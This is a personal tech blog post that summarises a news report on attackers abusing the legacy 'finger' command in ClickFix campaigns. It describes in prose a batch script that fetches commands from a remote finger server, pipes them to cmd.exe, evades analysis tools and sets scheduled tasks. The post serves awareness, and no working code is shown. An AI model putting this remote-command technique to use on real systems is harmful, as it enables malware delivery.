There is a decades old command I actually didn’t know that existed today, called finger. It allowed to see if someone you knew was online by looking up usernames which we used to log on.
Now, it looks like this is the second time that this protocol is being targeted to get Malware on to someone’s machine, and as new things go, it would not surprise me if this would continue in to next year.
A normal finger command would look like the image above. For those who can’t see the image, Jaws GPT as I call it, otherwise known as picture smart, says the following:
The image shows terminal text where a user named “bleeping” queries the “finger” command on a system called “bleep-test.” The output details the user information: login “bleeping,” real name “Lawrence Abrams,” home directory “/home/bleeping,” shell “/bin/bash,” and a placeholder office phone number. It shows two login sessions, one idle for 2 minutes 17 seconds on tty1 and another from IP 192.168.28.10 idle for 1 second. The user has no mail or plan files.
You’re probably thinking, “This is kind of cool. How do I run it?”
As I stated, I didn’t know it actually continued, but I did play with it when introduced to it. I believe this is one of these command prompt types of commands these days.
Now, it seems as though the command can now give out scripts and is used as part of click fix attacks. We’ve talked about click fix, and this is just a new tactic of them getting their wares on to our machine.
Picture smart says the following for this command for Finger.
The image displays a terminal or code editor window containing a script written in batch programming language. The script includes setting variables, loops, and conditional statements. It references various tools like Wireshark, Fiddler, ImmunityDebugger, and WindDump. The script checks for processes named “P.exe” or “SP.exe,” copies files with randomized names from curl commands, extracts PDF files, and runs shell commands involving DLLs. It also creates scheduled tasks using PowerShell with obfuscated variable names and terminates execution with an exit command.
We even have a RAT (Remote Access Trojan) that could be downloaded through this protocol.
It can even go so far as to give us an archive file like a zip file disguised as a PDF file.
This is absolutely crazy what we’re seening, and this is all research so far, and not widely used. It does not surprise me if this changes through the years.
The first set of paragraphs describe finger.
The decades-old “finger” command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices.
In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol, a command later added to Windows. While still supported, it’s rarely used today compared to its popularity decades ago.
When executed, the finger command returns basic information about a user, including their login name, name (if set in /etc/passwd), home directory, phone numbers, last seen, and other details.
The article continues:
Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks that retrieve commands to execute on devices.
This is not the first time the finger command has been abused in this way, as researchers warned in 2020 that it was used as a LOLBIN to download malware and evade detection.
Abusing the finger commandLast month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would use the “finger [.]com” command to retrieve commands from a remote finger server, which were then run locally by piping them through cmd.exe.
For those who do not know, cmd.exe is the executable to the command prompt. Hitting win+r (windows key plus r) to bring up the run dialogue and typing cmd will do the trick on bringing up this system.
Jaws, NVDA and other windows screen readers have been programmed to run within this system when DOS was eliminated.
There’s plenty more, so please check out the article I found on this by bleeping computer. Its titled Decades-old ‘Finger’ protocol abused in ClickFix malware attacks if this is somthing you’re interested in.
I found it interesting, I hope you do too.
Discover more from The Technology blog and podcast
Subscribe to get the latest posts sent to your email.